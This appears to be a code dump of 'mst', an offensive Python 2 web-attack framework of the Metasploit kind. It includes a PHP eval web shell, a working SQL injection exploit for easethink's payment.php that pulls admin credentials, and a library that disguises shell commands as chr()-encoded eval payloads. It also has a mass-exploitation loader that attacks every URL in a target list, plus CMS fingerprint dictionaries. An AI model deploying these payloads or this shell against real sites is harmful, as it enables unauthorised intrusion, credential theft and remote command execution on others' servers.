├── mst_20131023
├── libs
│ ├── __init__.py
│ ├── MstCache.pyc
│ ├── MstColor.pyc
│ ├── MstLoad.pyc
│ ├── MstPlugin.pyc
│ ├── MstUpdate.pyc
│ ├── __init__.pyc
│ ├── MstExploit.pyc
│ ├── MstPayload.pyc
│ ├── MultipartPostHandler.pyc
│ ├── MstPayload.py
│ ├── MstLoad.py
│ ├── MstColor.py
│ ├── MstExploit.py
│ ├── MstUpdate.py
│ ├── MultipartPostHandler.py
│ ├── MstPlugin.py
│ └── MstCache.py
├── cache
│ └── mst.cache
├── dicts
│ ├── what_cms
│ │ ├── qibo.txt
│ │ ├── others.txt
│ │ ├── hdwiki.txt
│ │ ├── shopex.txt
│ │ ├── espcms.txt
│ │ ├── powereasy.txt
│ │ ├── phpcms.txt
│ │ ├── phpwind.txt
│ │ ├── dedecms.txt
│ │ ├── word-press.txt
│ │ └── dz.txt
│ └── sub_domain.lst
├── temp
│ └── evalshell.php
├── plugins
│ ├── exploit
│ │ ├── ms12_020.py
│ │ ├── dede5.7_download.php_getshell.py
│ │ ├── shopex_4.8.5_api.php_SQLInject.py
│ │ ├── southidc_NewsType.asp_SQLInject.py
│ │ └── easethink_payment.php_SQLInject.py
│ ├── multi
│ │ ├── scan_ip_port.py
│ │ ├── crack_sub_domain.py
│ │ ├── sameIP_web[chinaz].py
│ │ └── what_cms.py
│ ├── payload
│ │ └── php_cmdshell.py
│ └── load
│ │ └── autofuck.py
└── mst.py
└── README.md
/mst_20131023/libs/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ### 当前版本停止维护
2 | ### mst2.0内测地址:[mst.3asec.com](http://mst.3asec.com/)
3 |
--------------------------------------------------------------------------------
/mst_20131023/cache/mst.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/cache/mst.cache
--------------------------------------------------------------------------------
/mst_20131023/libs/MstCache.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/libs/MstCache.pyc
--------------------------------------------------------------------------------
/mst_20131023/libs/MstColor.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/libs/MstColor.pyc
--------------------------------------------------------------------------------
/mst_20131023/libs/MstLoad.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/libs/MstLoad.pyc
--------------------------------------------------------------------------------
/mst_20131023/libs/MstPlugin.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/libs/MstPlugin.pyc
--------------------------------------------------------------------------------
/mst_20131023/libs/MstUpdate.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/libs/MstUpdate.pyc
--------------------------------------------------------------------------------
/mst_20131023/libs/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/libs/__init__.pyc
--------------------------------------------------------------------------------
/mst_20131023/libs/MstExploit.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/libs/MstExploit.pyc
--------------------------------------------------------------------------------
/mst_20131023/libs/MstPayload.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/libs/MstPayload.pyc
--------------------------------------------------------------------------------
/mst_20131023/dicts/what_cms/qibo.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/dicts/what_cms/qibo.txt
--------------------------------------------------------------------------------
/mst_20131023/temp/evalshell.php:
--------------------------------------------------------------------------------
1 | evalShell.php
3 | #PASSWORD:mst
4 | @eval($_POST['mst']);
5 | ?>
--------------------------------------------------------------------------------
/mst_20131023/dicts/what_cms/others.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/dicts/what_cms/others.txt
--------------------------------------------------------------------------------
/mst_20131023/plugins/exploit/ms12_020.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/plugins/exploit/ms12_020.py
--------------------------------------------------------------------------------
/mst_20131023/libs/MultipartPostHandler.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/libs/MultipartPostHandler.pyc
--------------------------------------------------------------------------------
/mst_20131023/plugins/multi/scan_ip_port.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/plugins/multi/scan_ip_port.py
--------------------------------------------------------------------------------
/mst_20131023/plugins/multi/crack_sub_domain.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/plugins/multi/crack_sub_domain.py
--------------------------------------------------------------------------------
/mst_20131023/plugins/payload/php_cmdshell.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/plugins/payload/php_cmdshell.py
--------------------------------------------------------------------------------
/mst_20131023/plugins/multi/sameIP_web[chinaz].py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/plugins/multi/sameIP_web[chinaz].py
--------------------------------------------------------------------------------
/mst_20131023/plugins/exploit/dede5.7_download.php_getshell.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/plugins/exploit/dede5.7_download.php_getshell.py
--------------------------------------------------------------------------------
/mst_20131023/dicts/what_cms/hdwiki.txt:
--------------------------------------------------------------------------------
1 | /kaiyuanhome/images/logo.jpg::26089e2b5dc983e21c7e4ee7139e55e2::hdwiki
2 | /css/official.css::82b446b52df165e451d015f9b7c95822::hdwiki
--------------------------------------------------------------------------------
/mst_20131023/plugins/exploit/shopex_4.8.5_api.php_SQLInject.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/plugins/exploit/shopex_4.8.5_api.php_SQLInject.py
--------------------------------------------------------------------------------
/mst_20131023/plugins/exploit/southidc_NewsType.asp_SQLInject.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mstsec/mst/HEAD/mst_20131023/plugins/exploit/southidc_NewsType.asp_SQLInject.py
--------------------------------------------------------------------------------
/mst_20131023/dicts/what_cms/shopex.txt:
--------------------------------------------------------------------------------
1 | /asset/javascripts/mootools.js::e3381f8f7d0788dd149e68c4d00249dc::shopex
2 | /asset/javascripts/scripts.js::c43e4b278ea17f2cde3bfa9212c28b24::shopex
--------------------------------------------------------------------------------
/mst_20131023/dicts/what_cms/espcms.txt:
--------------------------------------------------------------------------------
1 | /api/uc.php::f4c65c2e278282b8f614f6bdc086e4a8::espcms
2 | /js/My97DatePicker/lang/en.js::0132b0df672d053d320458a937450b65::espcms
3 | /js/My97DatePicker/lang/en.js::71ed96d7a61bf1f078eadeaae518ab9c::espcms
--------------------------------------------------------------------------------
/mst_20131023/dicts/what_cms/powereasy.txt:
--------------------------------------------------------------------------------
1 | /js/jquery.pack.js::e57fb6b9927bcef6bcef240a3ceb2cb8::powereasy
2 | /js/SiteCount.js::e57fb6b9927bcef6bcef240a3ceb2cb8::powereasy
3 | /t3/style/css/common/card.css::768184e902d7941211e4644d4aafbeb7::powereasy
--------------------------------------------------------------------------------
/mst_20131023/dicts/what_cms/phpcms.txt:
--------------------------------------------------------------------------------
1 | modules/scan/functions/global.func.php::d41d8cd98f00b204e9800998ecf8427e::phpcms
statics/images/icon/error.png::c8c0d39f058f3b62e81effd218b16bf6::phpcms
phpcms/modules/scan/functions/global.func.php::d41d8cd98f00b204e9800998ecf8427e::phpcms
--------------------------------------------------------------------------------
/mst_20131023/dicts/what_cms/phpwind.txt:
--------------------------------------------------------------------------------
1 | /res/js/dev/wind.js::7ad9ac3d647e00e12c615a06762430fe::phpwind
2 | /themes/site/default/images/logo.png::c2a75344349c39c7f4acaed8a7156293::phpwind
3 | /js/pw_ajax.js::8531a5f857019d7bdc00533728dfc9f6::phpwind
4 | /js/app_global.js::8531a5f857019d7bdc00533728dfc9f6::phpwind
--------------------------------------------------------------------------------
/mst_20131023/dicts/what_cms/dedecms.txt:
--------------------------------------------------------------------------------
1 | /plus/img/face/1.gif::89fe2f5e0467ef10f066272d07e2de57::dedecms
2 | /include/code/datalist.utf-8.inc::b3f27da60b6302fcfeeb56105716ca7d::dedecms
3 | /include/js/jquery/ui.core.js::ec7d2e180b647f8ee80fd7370f340a0d::dedecms
4 | /include/js/jquery/jquery.js::518215c646beff570b8d9849429139d4::dedecms
--------------------------------------------------------------------------------
/mst_20131023/dicts/what_cms/word-press.txt:
--------------------------------------------------------------------------------
1 | /wp-includes/js/jquery/jquery.js::fe633f13a47489e16d6d3b9065b20500::word-press
2 | /wp-includes/js/jquery/jquery.js?ver=1.10.::d3dd446e5ba92b8ffa78e596fda2c471::word-press
3 | /favicon.ico::f420dc2c7d90d7873a90d82cd7fde315::word-press
4 | /wp-includes/js/jquery/jquery-migrate.min.js::512b871a2830e44259bc3ce3343afcd0::word-press
5 | /wp-content/themes/daiphapinfo/images/ja.moomenu.js::f9ebcab64a388f8cac82dc25f654c287::word-press
6 | /wp-content/themes/daiphapinfo/images/PopupWindow.js::570fed3d8f8b447514ab3e987dc08f82::word-press
--------------------------------------------------------------------------------
/mst_20131023/dicts/what_cms/dz.txt:
--------------------------------------------------------------------------------
1 | /favicon.ico::c028c4822428e83a358c60a93ef65381::dz x2.5
2 | /static/js/admincp.js::05e0eee21760347218cbf225fc1b601c::dz x2.5
3 | /static/js/md5.js::ef058f07a773acf03f6d2f7f6ecb68fd::dz x2.5 or x3.0
4 | /static/js/md5.js::26511efb3ce6f474b4dfddbebc4bef48::dz x2
5 | /forumdata/cache/common.js::62304be19d86e64eaf78f8cd610b38a8::dz 7.2
6 | /images/common/online_member.gif::e679735ca6f5ed898ba98e4433565003::dz 7.2
7 | /images/default/reply.gif::c00763eee9ef06799151a9ee0b18ab13::dz 1.0
8 | /images/default/collapsed_no.gif::34bc7136efaf8c351b22bacf46576edd::dz 1.0
--------------------------------------------------------------------------------
/mst_20131023/plugins/load/autofuck.py:
--------------------------------------------------------------------------------
1 | from os import listdir
2 |
3 | ftype = raw_input("PARAMETER >")
4 | if len(ftype)>0:
5 | tmp=listdir("output")
6 | color.cprint("[*] CHOOSE `%s` FLIST [ID].."%ftype,YELLOW)
7 | for i in range(len(tmp)):
8 | color.cprint("[%s] %s"%(i,tmp[i]),PURPLE)
9 | lf = raw_input("ID >")
10 | try:
11 | ii = int(lf)
12 | ff = tmp[ii]
13 | if len(lf)>0:
14 | flist = open("output/%s"%ff).readlines()
15 | for f in flist:
16 | f = f.strip("\n")
17 | f = f.replace("http://","")
18 | mm.setp(ftype,f)
19 | mm.exploit()
20 | except Exception,e:
21 | color.cprint("[!] ERR:%s"%e,RED)
22 | else:
23 | color.cprint("[?] Ex.RURL",RED)
24 |
--------------------------------------------------------------------------------
/mst_20131023/plugins/exploit/easethink_payment.php_SQLInject.py:
--------------------------------------------------------------------------------
1 | '''
VUL FROM INTERNEL---NOT TEST IT :(
'''
class mstplugin:
infos = [
['NAME','easethink_SQLInject(payment.php)'],
['AUTHOR','mst'],
['TIME','20131024'],
['WEB','http://mstoor.duapp.com']
]
opts = [
['URL','localhost','REMOTE URL'],
['PORT','80','REMOTE URL-PORT'],
['PATH','/','REMOTE APP-PATH'],
['PAYLOAD','false','NEED NOT PAYLOAD']
]
def exploit(self):
if PORT == "443":
url = "https://%s%s"%(URL,PATH)
else:
url = "http://%s:%s%s"%(URL,PORT,PATH)
poc = "payment.php?act=return&class_name=-1' and (updatexml(1,concat(0x7c,(select concat(adm_name,0x3a,adm_password) from easethink_admin limit 1)),1))--"
exp = url+poc
try:
tmp = fuck.urlget(exp).read()
res = fuck.find(r'\:\w+[|]{1}\w+',tmp)
print res
except Exception,e:
print e
--------------------------------------------------------------------------------
/mst_20131023/libs/MstPayload.py:
--------------------------------------------------------------------------------
1 | '''
2 | mst=>payload=>fuck=>functions
3 | '''
4 |
5 | class fuck:
6 | '''functions for payload'''
7 | def phpdecode(self,phpcode):
8 | '''decode php code'''
9 | code="@eVAl("
10 | for p in phpcode:
11 | code+="cHR(%s)."%ord(p)
12 | code=code[:len(code)-1]
13 | code+=");"
14 | return code
15 |
16 | def urlpost(self,url,value):
17 | try:
18 | data=urllib.urlencode(value)
19 | user_agent='Mozilla/4.0 (commpatible;MSIE 5.5;Windows NT)'
20 | headers={'User-Agent':user_agent}
21 | req=urllib2.Request(url,data,headers)
22 | return urllib2.urlopen(req)
23 | except:
24 | return "false"
25 |
26 | def urlget(self,url):
27 | try:
28 | return urllib2.urlopen(url)
29 | except:
30 | return "false"
31 |
32 | def getres(self,url,pwd,c):
33 | '''get shell's response'''
34 | try:
35 | code = 'ecHO "{MST}";'
36 | code+= c
37 | code+= 'eChO "{MST}";'
38 | code = self.phpdecode(code)
39 | value= {pwd:code}
40 | tmp = self.urlpost(url,value).read()
41 | tmp = tmp.split("{MST}")[1]
42 | return tmp
43 | except Exception,e:
44 | return e
45 |
46 | if __name__=="__main__":
47 | print __doc__
48 | else:
49 | global payloadfuck
50 | payloadfuck=fuck()
51 |
--------------------------------------------------------------------------------
/mst_20131023/libs/MstLoad.py:
--------------------------------------------------------------------------------
1 | '''
2 | Mst=>class=>load::load plugin
3 | Mst=>class=>plug::plugin class
4 | '''
5 | from MstColor import *
6 | from MstPlugin import *
7 |
8 | class load:
9 | '''load mst plugin'''
10 | def start(self,plutype,pluname):
11 | try:
12 | mm=m("plugins/%s.py"%pluname)
13 | while 1:
14 | mm.printp(plutype,pluname)
15 | pcmd=raw_input(">")
16 | if pcmd == 'back' or pcmd == 'exit':
17 | break
18 | elif pcmd == 'help':
19 | mm.pluhelp()
20 | elif pcmd == 'cls':
21 | mm.cls()
22 | elif pcmd == 'info':
23 | mm.info()
24 | elif pcmd == 'opts':
25 | mm.opt()
26 | elif pcmd == 'exploit':
27 | mm.exploit()
28 | elif pcmd == 'load':
29 | mm.load()
30 | elif pcmd == 'set':
31 | color.cprint("[?] USAGE:set ",YELLOW)
32 | elif len(pcmd.split(" "))==2:
33 | ptmp=pcmd.split(" ")
34 | if ptmp[0] == "load":
35 | if len(ptmp[0])>0 and len(ptmp[1])>0:
36 | execfile("plugins/load/%s.py"%ptmp[1])
37 | elif len(pcmd.split(" "))==3:
38 | ptmp=pcmd.split(" ")
39 | if ptmp[0] == "set":
40 | if len(ptmp[1])>0 and len(ptmp[2])>0:
41 | mm.setp(ptmp[1],ptmp[2])
42 | except KeyboardInterrupt:
43 | color.cprint("\n[!] CTRL+C EXIT !",RED)
44 | except Exception,e:
45 | color.cprint("[!] ERR:%s"%e,RED)
46 |
47 |
48 | if __name__ == '__main__':
49 | print __doc__
50 | else:
51 | load=load()
52 |
--------------------------------------------------------------------------------
/mst_20131023/libs/MstColor.py:
--------------------------------------------------------------------------------
1 | '''
2 | Mst=>libs=>color
3 | '''
4 | from os import name
5 | if name == 'nt':
6 | '''windows color table'''
7 | #global BLACK,BLUE,GREEN,CYAN,RED,PURPLE,YELLOW,WHITE,GREY
8 | BLACK = 0x0
9 | BLUE = 0x01
10 | GREEN = 0x02
11 | CYAN = 0x03
12 | RED = 0x04
13 | PURPLE= 0x05
14 | YELLOW= 0x06
15 | WHITE = 0x07
16 | GREY = 0x08
17 | else:
18 | '''other os color table'''
19 | #global BLACK,BLUE,GREEN,CYAN,RED,PURPLE,YELLOW,WHITE,GREY
20 | BLACK = '\033[0m'
21 | BLUE = '\033[34m'
22 | GREEN = '\033[32m'
23 | CYAN = '\033[36m'
24 | RED = '\033[31m'
25 | PURPLE= '\033[35m'
26 | YELLOW= '\033[33m'
27 | WHITE = '\033[37m'
28 | GREY = '\033[38m'
29 | wincode = """
30 | class ntcolor:
31 | '''windows cmd color'''
32 | try:
33 | STD_INPUT_HANDLE = -10
34 | STD_OUTPUT_HANDLE= -11
35 | STD_ERROR_HANDLE = -12
36 | import ctypes
37 | std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
38 | def set_cmd_text_color(self,color, handle=std_out_handle):
39 | '''set color'''
40 | bool = self.ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
41 | return bool
42 | def resetColor(self):
43 | '''reset color'''
44 | self.set_cmd_text_color(RED|GREEN|BLUE)
45 | def cprint(self,msg,color=BLACK,enter=1):
46 | '''print color message'''
47 | self.set_cmd_text_color(color|color|color)
48 | if enter == 1:
49 | print msg
50 | else:
51 | print msg,
52 | self.resetColor()
53 | except:
54 | pass
55 | """
56 | otcode = """
57 | class otcolor:
58 | '''other os terminal color'''
59 | def cprint(self,msg,color=BLACK,enter=1):
60 | '''print color message'''
61 | if enter == 1:
62 | print color+msg+BLACK
63 | else:
64 | print color+msg+BLACK,
65 | """
66 | if __name__ == '__main__':
67 | print __doc__
68 | else:
69 | if name == 'nt':
70 | exec(wincode)
71 | color = ntcolor()
72 | else:
73 | exec(otcode)
74 | color = otcolor()
75 |
--------------------------------------------------------------------------------
/mst_20131023/plugins/multi/what_cms.py:
--------------------------------------------------------------------------------
1 | class mstplugin:
2 | infos=[
3 | ['Name','What_Cms'],
4 | ['Description','Match the cms type'],
5 | ['Author','L34Rn'],
6 | ['Mail','cnh4ckff@gmail.com'],
7 | ['Blog','http://hi.baidu.com/l34rn'],
8 | ['DATE','20131023'],
9 | ['IMPORT','[dicts/what_cms/] => [Web_dir::Hash::cms]']
10 | ]
11 |
12 | opts=[
13 | ['HOST','www.cms.com','The host need to match'],
14 | ['PORT','80','The port of the webserver'],
15 | ['PATH','/','The path of the cms who need to match'],
16 | ['PAYLOAD','false','Not need!']
17 | ]
18 |
19 |
20 | def exploit(self):
21 | host=self.host_reduce_http(HOST)
22 | port=PORT
23 | path=PATH
24 | color.cprint('[+] what_cms start OK!',BLUE)
25 | color.cprint('[+] [TARGET] '+host,BLUE)
26 | if str(host)=='443':
27 | _host='http://'+host+path
28 | else:
29 | _host='http://'+host+':'+port+path
30 | try:
31 | cms=self.what_cms(_host)
32 | if cms=='Falied':
33 | color.cprint('\n[!] All Done!\n[!] But Falied!',RED)
34 | else:
35 | color.cprint('\n[+] Good News!\n[+] '+cms,GREEN)
36 | except Exception,e:
37 | color.cprint('\n[!] Error=>'+str(e),RED)
38 |
39 | def host_reduce_http(self,host):
40 | l=len(host.split('//'))
41 | if l==1:
42 | host=host.strip()
43 | host=host.split('/')[0]
44 | elif l==2:
45 | host=host.split('//')[1]
46 | host=host.split('/')[0]
47 | else:
48 | host='Error!'
49 | return host
50 |
51 | def what_cms(self,host):
52 |
53 | def get_md5(html):
54 | m=hashlib.md5()
55 | m.update(html)
56 | md5=m.hexdigest()
57 | return md5
58 |
59 | def get_html(url):
60 | url=url.strip()
61 | html=urllib.urlopen(url).read()
62 | return html
63 |
64 | cms_list=listdir('dicts/what_cms/')
65 |
66 | for cms in cms_list:
67 | f=open('dicts/what_cms/'+cms,'r')
68 | lines=f.readlines()
69 | f.close()
70 | for line in lines:
71 | l=line.split('::')
72 | web_dir=l[0]
73 | hash=l[1]
74 | cms_version=l[2]
75 | url=host+web_dir
76 | sys.stdout.write('\r[*] [TRYING] %s'% web_dir.strip())
77 | try:
78 | _html=get_html(url)
79 | _md5=get_md5(_html)
80 | if _md5==hash:
81 | result=url+' => '+cms_version
82 | return result
83 | break
84 | except Exception,e:
85 | color.cprint('[!] Error=>'+str(e),RED)
86 | pass
87 | return 'Failed'
88 |
--------------------------------------------------------------------------------
/mst_20131023/libs/MstExploit.py:
--------------------------------------------------------------------------------
1 | '''
2 | Mst=>Exploit=>fuck=>Class
3 | '''
4 | from socket import *
5 | from MstColor import *
6 | from os import listdir,getcwd
7 | import urllib
8 | import urllib2
9 | import cookielib
10 | import re,sys,hashlib
11 | import MultipartPostHandler
12 |
13 |
14 | class fuck:
15 | ''' all plugins function :)'''
16 | def checkport(self,host,port):
17 | '''check host's port !open?::return 1 or 0'''
18 | try:
19 | s=socket(AF_INET,SOCK_STREAM)
20 | s.settimeout(5)
21 | s.connect((host,int(port)))
22 | s.close()
23 | return 1
24 | except:
25 | return 0
26 | def urlget(self,url):
27 | '''url open=>get'''
28 | return urllib.urlopen(url)
29 |
30 | def urlpost(self,url,value):
31 | '''url post'''
32 | data = urllib.urlencode(value)
33 | headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11' }
34 | res = urllib2.Request(url,data,headers)
35 | try:
36 | ok = urllib2.urlopen(res)
37 | return ok
38 | except:
39 | return 0
40 | def urlupload(self,url,value):
41 | '''url upload file'''
42 | cookies = cookielib.CookieJar()
43 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies),
44 | MultipartPostHandler.MultipartPostHandler)
45 | opener.open(url, value)
46 | def urltoip(self,url):
47 | '''url to ip'''
48 | return gethostbyname(url)
49 |
50 | def writelog(self,logname,log):
51 | '''write log to file'''
52 | fp = open('output/%s.log'%logname,'a')
53 | fp.write(log)
54 | fp.close()
55 |
56 | def find(self,r,t):
57 | '''re find'''
58 | return re.findall(r,t)
59 |
60 | def topayload(self,PAYLOAD,arr):
61 | '''load payload'''
62 | if PAYLOAD.upper() != "FALSE" and len(PAYLOAD)>0:
63 | color.cprint("[*] Start Payload ..",YELLOW)
64 | code=open("plugins/payload/"+PAYLOAD+".py").read()
65 | exec(code)
66 | exec("global mstpayload")
67 | payload=mstpayload(arr)
68 | code=open("libs/MstPayload.py").read()
69 | exec(code)
70 | payload.start()
71 |
72 |
73 | if __name__ == '__main__':
74 | print __doc__
75 |
--------------------------------------------------------------------------------
/mst_20131023/mst.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python2.7
2 | #coding:utf-8
3 | #####################
4 | #mst::My Sec Tools
5 | #ver::1.0
6 | #mkt::2013-10-18
7 | #####################
8 | from libs.MstUpdate import *
9 | from libs.MstCache import cache
10 |
11 | cache.start()
12 | updateplu = updateplu(cache.getplunums("all"))
13 | updatemst = updatemst()
14 |
15 | if __name__=='__main__':
16 | try:
17 | while 1:
18 | cache.printmst()
19 | cmd=raw_input('>')
20 | if cmd == 'help':
21 | cache.mainhelp()
22 | elif cmd == 'exit':
23 | cache.mainexit()
24 | elif cmd == 'cls' :
25 | cache.cls()
26 | elif cmd == 'use':
27 | cache.usage("use")
28 | elif cmd == 'show':
29 | cache.usage("show")
30 | elif cmd == 'search':
31 | cache.usage("search")
32 | elif cmd == 'banner':
33 | cache.banner()
34 | elif cmd == 'update':
35 | cache.usage("update")
36 | elif len(cmd.split(" ")) == 2:
37 | cnd = cmd.split(" ")
38 | c = cnd[0]
39 | g = cnd[1]
40 | if c == 'search':
41 | if len(g)>0 and len(g.split(" "))>0:
42 | cache.search(g)
43 | else:
44 | cache.usage("search")
45 | elif c == 'show':
46 | if g == 'exploit':
47 | cache.showplus('exploit')
48 | elif g == 'payload':
49 | cache.showplus('payload')
50 | elif g == 'multi':
51 | cache.showplus('multi')
52 | elif g == 'all':
53 | cache.showplus('all')
54 | else:
55 | cache.usage("show")
56 | elif c == 'use':
57 | if len(g) > 0 or len(g.split(" ")) > 0:
58 | cache.load(g)
59 | else:
60 | cache.usage("use")
61 | elif c == 'update':
62 | if len(g) >0 or len(g.split(" ")) > 0:
63 | if g == "mst":
64 | updatemst.checkupdate()
65 | elif g == "plugins":
66 | updateplu.checkupdate()
67 | else:
68 | cache.usage("update")
69 | else:
70 | cache.usage("update")
71 | elif len(cmd) > 0:
72 | cache.execmd(cmd)
73 | elif len(cmd) > 0:
74 | cache.execmd(cmd)
75 | except KeyboardInterrupt:
76 | cache.mainexit()
77 | except Exception,e:
78 | cache.errmsg(e)
79 |
--------------------------------------------------------------------------------
/mst_20131023/libs/MstUpdate.py:
--------------------------------------------------------------------------------
1 | '''
2 | Mst=>Update=>class
3 | update!update!!
4 | '''
5 | from urllib import urlopen
6 | from os import path
7 | from MstColor import *
8 | from base64 import decodestring as de
9 |
10 | seru = "http://mstoor.duapp.com/" #UPDATE SERVER HOST
11 | nver = "20131023" #NOW VERSION
12 |
13 | class updatemst:
14 | '''update plugins'''
15 | def checkupdate(self):
16 | '''check if has new version'''
17 | color.cprint("[*] Access to the remote version..",YELLOW)
18 | try:
19 | sver = self.getver()
20 | sver = sver.replace("\n","")
21 | if int(sver) > int(nver):
22 | color.cprint("[i] There is a new version[%s],do u want to update?"%sver,GREEN,0)
23 | c = raw_input("[y/n]")
24 | if c.upper() == "Y":
25 | color.cprint("[i] Start update...",YELLOW)
26 | self.download(sver)
27 | else:
28 | color.cprint("[*] No new version[NOW:%s | SER:%s]"%(nver,sver),RED)
29 | except Exception,e:
30 | color.cprint("[!] ERR:%s"%e,RED)
31 | def getver(self):
32 | '''get new version'''
33 | return urlopen(seru+"update/?do=ver").read()
34 | def download(self,sver):
35 | '''start update'''
36 | try:
37 | color.cprint("[*] Start download..",YELLOW)
38 | downurl = urlopen(seru+"update/?do=url").read()
39 | tmp = urlopen(downurl).read()
40 | color.cprint("[*] Save download..",GREEN)
41 | newname = "mst_%s.zip"%sver
42 | newmst = open(newname,"w")
43 | newmst.write(tmp)
44 | newmst.close()
45 | color.cprint("[*] Download OK![%s]"%newname,YELLOW)
46 | except Exception,e:
47 | color.cprint("[!] ERR:%s"%e,RED)
48 |
49 | class updateplu:
50 | '''update mst self'''
51 | def __init__(self,n_p_n):
52 | '''get now plugins num'''
53 | self.n=n_p_n
54 | def checkupdate(self):
55 | '''check has new plus?'''
56 | try:
57 | color.cprint("[*] Check server's plugins..",YELLOW)
58 | ser_plu_nums = urlopen(seru+"update/?do=pns").read()
59 | ln = int(self.n)
60 | rn = int(ser_plu_nums)
61 | if rn>ln:
62 | color.cprint("[i] Have new plugins,Down?[%s::%s]"%(ln,rn),GREEN,0)
63 | ok=raw_input("[y/n]")
64 | if ok.upper() == "Y":
65 | self.download()
66 | else:
67 | color.cprint("[!] Not new plugins !(l:%s r:%s)"%(ln,rn),RED)
68 | except Exception,e:
69 | color.cprint("[!] ERR:%s"%e,RED)
70 |
71 | def download(self):
72 | '''start down plugins'''
73 | color.cprint("[*] Start Download..",YELLOW)
74 | try:
75 | uplist = urlopen(seru+"update/?do=list").readlines()
76 | listnn = len(uplist)-1
77 | listii = 1
78 | for u in uplist:
79 | if len(u)>5:
80 | u = u.strip("\n")
81 | u = u.split("{|MST|}")
82 | purl = u[0]
83 | pname =de(u[1])
84 | if pname[len(pname)-3:] != ".py":
85 | pname += ".py"
86 | ptype =de(u[2])
87 | lfile = "plugins/%s/%s"%(ptype,pname)
88 | color.cprint("[%s/%s] Download:%s::%-20s=>"%(listii,listnn,ptype,pname),CYAN,0)
89 | try:
90 | if path.exists(lfile):
91 | color.cprint("ERR:ALREADY EXISTS!",RED)
92 | else:
93 | fp = open("plugins/%s/%s"%(ptype,pname),"w")
94 | ok = urlopen(purl).read()
95 | tmp= ok.replace("\n","")
96 | fp.write(tmp)
97 | fp.close()
98 | color.cprint("Done !",GREEN)
99 | except Exception,e:
100 | color.cprint("ERR:%s"%e,RED)
101 | listii += 1
102 | color.cprint("[*] ALL UPDATE DONE !PLEASE RESTART MST !",RED)
103 | except Exception,e:
104 | color.cprint("[!] Update Error!CODE:%s"%e,RED)
105 | if __name__ == '__main__':
106 | print __doc__
107 |
--------------------------------------------------------------------------------
/mst_20131023/libs/MultipartPostHandler.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | ####
4 | # 02/2006 Will Holcomb
5 | #
6 | # This library is free software; you can redistribute it and/or
7 | # modify it under the terms of the GNU Lesser General Public
8 | # License as published by the Free Software Foundation; either
9 | # version 2.1 of the License, or (at your option) any later version.
10 | #
11 | # This library is distributed in the hope that it will be useful,
12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
14 | # Lesser General Public License for more details.
15 | #
16 | """
17 | Usage:
18 | Enables the use of multipart/form-data for posting forms
19 |
20 | Inspirations:
21 | Upload files in python:
22 | http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
23 | urllib2_file:
24 | Fabien Seisen:
25 |
26 | Example:
27 | import MultipartPostHandler, urllib2, cookielib
28 |
29 | cookies = cookielib.CookieJar()
30 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies),
31 | MultipartPostHandler.MultipartPostHandler)
32 | params = { "username" : "bob", "password" : "riviera",
33 | "file" : open("filename", "rb") }
34 | opener.open("http://wwww.bobsite.com/upload/", params)
35 |
36 | Further Example:
37 | The main function of this file is a sample which downloads a page and
38 | then uploads it to the W3C validator.
39 | """
40 |
41 | import urllib
42 | import urllib2
43 | import mimetools, mimetypes
44 | import os
45 |
46 | class Callable:
47 | def __init__(self, anycallable):
48 | self.__call__ = anycallable
49 |
50 | # Controls how sequences are uncoded. If true, elements may be given multiple values by
51 | # assigning a sequence.
52 | doseq = 1
53 |
54 | class MultipartPostHandler(urllib2.BaseHandler):
55 | handler_order = urllib2.HTTPHandler.handler_order - 10 # needs to run first
56 |
57 | def http_request(self, request):
58 | data = request.get_data()
59 | if data is not None and type(data) != str:
60 | v_files = []
61 | v_vars = []
62 | try:
63 | for key, value in data.items():
64 | if type(value) == file:
65 | v_files.append((key, value))
66 | else:
67 | v_vars.append((key, value))
68 | except TypeError:
69 | systype, value, traceback = sys.exc_info()
70 | raise TypeError, "not a valid non-string sequence or mapping object", traceback
